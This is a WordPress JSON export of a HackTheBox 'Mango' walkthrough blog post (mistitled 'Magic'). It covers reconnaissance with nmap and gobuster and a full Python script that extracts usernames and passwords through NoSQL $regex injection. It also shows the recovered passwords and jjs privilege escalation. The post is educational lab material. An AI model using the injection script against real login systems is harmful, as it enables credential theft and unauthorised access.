{"id":20,"date":"2020-04-27T11:47:45","date_gmt":"2020-04-27T11:47:45","guid":{"rendered":"https:\/\/shreyapohekar.com\/blogs\/?p=20"},"modified":"2020-05-09T11:06:12","modified_gmt":"2020-05-09T11:06:12","slug":"hackthebox-magic-walkthrough","status":"publish","type":"post","link":"https:\/\/shreyapohekar.com\/blogs\/hackthebox-magic-walkthrough\/","title":{"rendered":"HackTheBox : Magic Walkthrough"},"content":{"rendered":"\n<p>Hello everyone!!<\/p>\n\n\n\n<p>This is Shreya Pohekar. And today, we are doing Mango from HackTheBox. It's an easy Linux box that mainly focuses on <strong>NoSQL injection<\/strong> to get the initial foothold, and privilege escalation via a Java command-line tool (<strong>jjs<\/strong>) that interprets JavaScript.<\/p>\n\n\n\n<p>So let's get started.<\/p>\n\n\n\n<p>A simple nmap scan showed a few open ports: ssh, http and https.<\/p>\n\n\n\n<pre class=\"wp-block-preformatted wpf-blue-background\"># nmap -sC -sV -o mangoscan.nmap 10.10.10.162<\/pre>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh6.googleusercontent.com\/Y-fUv8SqPoYElyAenhBWXIHTsyjJsMtDZeiGI1-_8_9bgGF3KL2YjD_3MVcyrWy3k-tVuuGMgKgKOHxJRqa0kuRJVp9XLg58Y1PYOyeNpS9WH09x6q9blnScGZOgksQZ2yWpdBEM\" alt=\"\"\/><\/figure>\n\n\n\n<p>The certificate CN was obtained from the nmap results.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh5.googleusercontent.com\/DKnaxS3I8r862NDRF4TvWYNBRYTzCbIGgDgXRKqsPKZuaLH6k8II9QDljJVcKN4t4k59KNwEx66ZuVOKd7pcZdB1D9vs_h0bARWMSJqBmkJBwHf4iaur3XfXaMOFqmw_eGAByhMu\" alt=\"\"\/><\/figure>\n\n\n\n<p>We have to add this entry to \/etc\/hosts:<\/p>\n\n\n\n<div class=\"wp-block-group\"><div class=\"wp-block-group__inner-container is-layout-flow wp-block-group-is-layout-flow\">\n<pre class=\"wp-block-preformatted wpf-blue-background\"># vim \/etc\/hosts<\/pre>\n\n\n\n<ul class=\"wp-block-list\"><li>10.10.10.162 staging-order.mango.htb<\/li><\/ul>\n<\/div><\/div>\n\n\n\n<p>Access to <a 
href=\"http:\/\/10.10.10.162\">http:\/\/10.10.10.162<\/a> was forbidden, so I tried <a href=\"https:\/\/10.10.10.162\">https:\/\/10.10.10.162<\/a> and a page loaded that looked similar to the Google search engine page.<\/p>\n\n\n\n<p>I ran a gobuster scan with the -k switch to skip SSL certificate verification for https websites.<\/p>\n\n\n\n<pre class=\"wp-block-preformatted wpf-blue-background\"># gobuster -u https:\/\/10.10.10.162 -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -t 50 -k<\/pre>\n\n\n\n<p>Alongside, I went to <a href=\"https:\/\/staging-order.mango.htb\">https:\/\/staging-order.mango.htb<\/a> and got a <strong>login page<\/strong>.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh3.googleusercontent.com\/rKCqt0K1Wj8FX9HfADNR1j_lsanteE16Zl8Bz9iSAhioTnDOn-HG4D-nNWg6kXNBUwouLOmCa47x4z0MUjLIDu1-QYRFMe-f1vQvPSP34jZn1-t82_Mx7EWpiT-kTu2Aom6ykOZG\" alt=\"\"\/><\/figure>\n\n\n\n<p>I tried different username-password combinations but nothing worked. The page returned a 200 OK response for every request made. 
So I intercepted the request through Burp and, after a bit of digging, found a NoSQL injection vulnerability in the login form.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh5.googleusercontent.com\/O5HFwW17ZFQ97akAjmfEFajd8y2-Lig8GW_sZ4p6Lj9cOOxgTFW5-49XTNGbpBmIzqG49dgoM_UGINe4sra1Lk2AzbSlTRdfGnCickqTfILRjjWij8N4aeHh3y_IUptV0Qq22pLj\" alt=\"\"\/><\/figure>\n\n\n\n<p>(credits: <a href=\"https:\/\/book.hacktricks.xyz\/pentesting-web\/nosql-injection\">https:\/\/book.hacktricks.xyz\/pentesting-web\/nosql-injection<\/a>)<\/p>\n\n\n\n<p>Using the above payload, the response obtained in Burp was 302 Found.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh6.googleusercontent.com\/Ftq3h1jl7vpLl_8Et0WyOYkcObDQUm2LzViulkzOLdCGA0r94hjOo89BrlMU25l7PLQ47uwU33D-MVWmXaZZtGEeOu_v_6xRNliz9lsHe2rVUHvOT8PR2PlePPaPOnSDhl99xYSg\" alt=\"\"\/><\/figure>\n\n\n\n<p>I realized that by using the <strong>$regex<\/strong> parameter, the usernames and passwords can be retrieved one character per request: a 302 means the regex matched, a 200 means it did not.<\/p>\n\n\n\n<p style=\"color:#1f1e1e\" class=\"has-text-color has-drop-cap\">I grabbed a script from <a href=\"https:\/\/book.hacktricks.xyz\/pentesting-web\/nosql-injection\">hacktricks<\/a> that performs the same steps.<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>import requests\nimport string\n\nurl = \"http:\/\/staging-order.mango.htb\"\nheaders = {\"Host\": \"staging-order.mango.htb\"}\ncookies = {\"PHPSESSID\": \"8m928e8vlmg8de7bl7vr9fpndk\"}\n# Letters and digits are used as-is; punctuation and whitespace are\n# backslash-escaped so the regex matches them literally\npossible_chars = list(string.ascii_letters) + list(string.digits) + &#91;\"\\\\\" + c for c in string.punctuation + string.whitespace]\n\n\ndef get_password(username):\n    print(\"Extracting password of \" + username)\n    params = {\"username\": username, \"password&#91;$regex]\": \"\", \"login\": \"login\"}\n    password = \"^\"\n    while True:\n        for c in possible_chars:\n            params&#91;\"password&#91;$regex]\"] = password + c + \".*\"\n            pr = requests.post(url, data=params, headers=headers, cookies=cookies, verify=False, allow_redirects=False)\n            # 302 means the regex matched one more character of the password\n            if pr.status_code == 302:\n                password += c\n                break\n        else:\n            # No character extended the match, so the password is complete\n            print(\"Found password \" + password&#91;1:].replace(\"\\\\\", \"\") + \" for username \" + username)\n            return password&#91;1:].replace(\"\\\\\", \"\")\n\n\ndef get_usernames():\n    usernames = &#91;]\n    params = {\"username&#91;$regex]\": \"\", \"password&#91;$regex]\": \".*\", \"login\": \"login\"}\n    for c in possible_chars:\n        username = \"^\" + c\n        params&#91;\"username&#91;$regex]\"] = username + \".*\"\n        pr = requests.post(url, data=params, headers=headers, cookies=cookies, verify=False, allow_redirects=False)\n        if pr.status_code == 302:\n            print(\"Found username starting with \" + c)\n            while True:\n                for c2 in possible_chars:\n                    params&#91;\"username&#91;$regex]\"] = username + c2 + \".*\"\n                    pr = requests.post(url, data=params, headers=headers, cookies=cookies, verify=False, allow_redirects=False)\n                    if pr.status_code == 302:\n                        username += c2\n                        print(username)\n                        break\n                else:\n                    # No character extended the match, so the username is complete\n                    print(\"Found username: \" + username&#91;1:])\n                    usernames.append(username&#91;1:])\n                    break\n    return usernames\n\n\nfor u in get_usernames():\n    get_password(u)\n<\/code><\/pre>\n\n\n\n<p>The script enumerated the users admin and mango, with passwords <strong>t9KcS3>!0B#2<\/strong> and <strong>h3mXK8RhU~f{]f5H<\/strong> respectively.<\/p>\n\n\n\n<p>I logged in over ssh with the credentials of mango:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted wpf-blue-background\"># ssh mango@10.10.10.162<\/pre>\n\n\n\n<p>Then I switched user to admin and got an sh shell.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img 
decoding=\"async\" src=\"https:\/\/lh5.googleusercontent.com\/oy9GbWvRPxUS8XpEvjg2LJamS6XDv3nHGtzlvZZPfDml3zTl8YwddMaW-FqSsq_PVc0uRB2ntS8mbEE-BZ3ezPbUmDVqFHco8XaUPkUOs_3m-mMy0vLCQPUy-DhbdycleMn3c5So\" alt=\"\"\/><\/figure>\n\n\n\n<p>Got the user.txt.<\/p>\n\n\n\n<p>Running ls -la listed a file .jjs.history that looked interesting, so I found out the location of the jjs binary.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh4.googleusercontent.com\/sxIsj_A_2UidhQXbBXsknQ5kA4g5MGJA3if-WhKi3L5DZc4ibieWlVS4NNwx39d4RiU-Rt5GJjVH8ooPAnXPODykMql7O_OHeHnGremj3QgCf56I6GSa7PuMSUXN3sSDi-L7G4Le\" alt=\"\"\/><\/figure>\n\n\n\n<p>Interestingly, the binary was running as root and could lead to privilege escalation.<\/p>\n\n\n\n<p>Upon googling a bit, I found out that privilege escalation was possible with jjs.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh5.googleusercontent.com\/ryDWOyINU8H6B9fAvb8_QZxn14nNc7iPqUvkhG9jWZ3t1sMTbrK7gJVhmD4FhU6UnGHhdHL4vpMH7b1EKBumos7pLlp8BT4NFY_04mcEffr99p20hhhH_arpS7UtyXn_kSfLpdUW\" alt=\"\"\/><\/figure>\n\n\n\n<p>I used the <strong>file read<\/strong> functionality, which can read any file with privileged rights. In the code, I directly inserted the path to root.txt and upon successful execution got the root flag.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh3.googleusercontent.com\/sGub4IJ114EVjXo2pWg8nBP_b1D5ucwy0C6R75o4ULPz3JzjpO5IEUHWoRBrmcM8_sztDjGFdFppkeKFc_lwsUlfWTRkl73DWB-fU8qKIV3rqXohaKMIulHL8mLE7PH-zVHz0qcE\" alt=\"\"\/><\/figure>\n\n\n\n<p>That\u2019s all for this blog post. Hope you enjoyed reading and learned something out of it.<\/p>\n\n\n\n<p>For more such content subscribe to my page! <br>\nUntil then, Happy Hunting!!!<\/p>\n","protected":false},"excerpt":{"rendered":"<p>An easy machine from HacktheBox. 
Let&#8217;s grab the root flag&#8230;..<\/p>\n","protected":false},"author":1,"featured_media":21,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"ocean_post_layout":"","ocean_both_sidebars_style":"","ocean_both_sidebars_content_width":0,"ocean_both_sidebars_sidebars_width":0,"ocean_sidebar":"","ocean_second_sidebar":"","ocean_disable_margins":"enable","ocean_add_body_class":"","ocean_shortcode_before_top_bar":"","ocean_shortcode_after_top_bar":"","ocean_shortcode_before_header":"","ocean_shortcode_after_header":"","ocean_has_shortcode":"","ocean_shortcode_after_title":"","ocean_shortcode_before_footer_widgets":"","ocean_shortcode_after_footer_widgets":"","ocean_shortcode_before_footer_bottom":"","ocean_shortcode_after_footer_bottom":"","ocean_display_top_bar":"default","ocean_display_header":"default","ocean_header_style":"","ocean_center_header_left_menu":"","ocean_custom_header_template":"","ocean_custom_logo":0,"ocean_custom_retina_logo":0,"ocean_custom_logo_max_width":0,"ocean_custom_logo_tablet_max_width":0,"ocean_custom_logo_mobile_max_width":0,"ocean_custom_logo_max_height":0,"ocean_custom_logo_tablet_max_height":0,"ocean_custom_logo_mobile_max_height":0,"ocean_header_custom_menu":"","ocean_menu_typo_font_family":"","ocean_menu_typo_font_subset":"","ocean_menu_typo_font_size":0,"ocean_menu_typo_font_size_tablet":0,"ocean_menu_typo_font_size_mobile":0,"ocean_menu_typo_font_size_unit":"px","ocean_menu_typo_font_weight":"","ocean_menu_typo_font_weight_tablet":"","ocean_menu_typo_font_weight_mobile":"","ocean_menu_typo_transform":"","ocean_menu_typo_transform_tablet":"","ocean_menu_typo_transform_mobile":"","ocean_menu_typo_line_height":0,"ocean_menu_typo_line_height_tablet":0,"ocean_menu_typo_line_height_mobile":0,"ocean_menu_typo_line_height_unit":"","ocean_menu_typo_spacing":0,"ocean_menu_typo_spacing_tablet":0,"ocean_menu_typo_spacing_mobile":0,"ocean_menu_typo_spacing_unit":"","ocean_menu_link_color":"",
"ocean_menu_link_color_hover":"","ocean_menu_link_color_active":"","ocean_menu_link_background":"","ocean_menu_link_hover_background":"","ocean_menu_link_active_background":"","ocean_menu_social_links_bg":"","ocean_menu_social_hover_links_bg":"","ocean_menu_social_links_color":"","ocean_menu_social_hover_links_color":"","ocean_disable_title":"default","ocean_disable_heading":"default","ocean_post_title":"","ocean_post_subheading":"","ocean_post_title_style":"","ocean_post_title_background_color":"","ocean_post_title_background":0,"ocean_post_title_bg_image_position":"","ocean_post_title_bg_image_attachment":"","ocean_post_title_bg_image_repeat":"","ocean_post_title_bg_image_size":"","ocean_post_title_height":0,"ocean_post_title_bg_overlay":0.5,"ocean_post_title_bg_overlay_color":"","ocean_disable_breadcrumbs":"default","ocean_breadcrumbs_color":"","ocean_breadcrumbs_separator_color":"","ocean_breadcrumbs_links_color":"","ocean_breadcrumbs_links_hover_color":"","ocean_display_footer_widgets":"default","ocean_display_footer_bottom":"default","ocean_custom_footer_template":"","ocean_post_oembed":"","ocean_post_self_hosted_media":"","ocean_post_video_embed":"","ocean_link_format":"","ocean_link_format_target":"self","ocean_quote_format":"","ocean_quote_format_link":"post","ocean_gallery_link_images":"on","ocean_gallery_id":[],"footnotes":""},"categories":[19,2],"tags":[26,29,31,27,28,30],"class_list":["post-20","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-hackthebox","category-information-security","tag-hackthebox","tag-jjs-exploit","tag-jjs-gtfobins","tag-mango-hackthebox","tag-mango-walkthrough","tag-nosql-injection","entry","has-media"],"aioseo_notices":[],"_links":{"self":[{"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/posts\/20"}],"collection":[{"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/types\/post"}],"au
thor":[{"embeddable":true,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/comments?post=20"}],"version-history":[{"count":5,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/posts\/20\/revisions"}],"predecessor-version":[{"id":114,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/posts\/20\/revisions\/114"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/media\/21"}],"wp:attachment":[{"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/media?parent=20"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/categories?post=20"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/tags?post=20"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}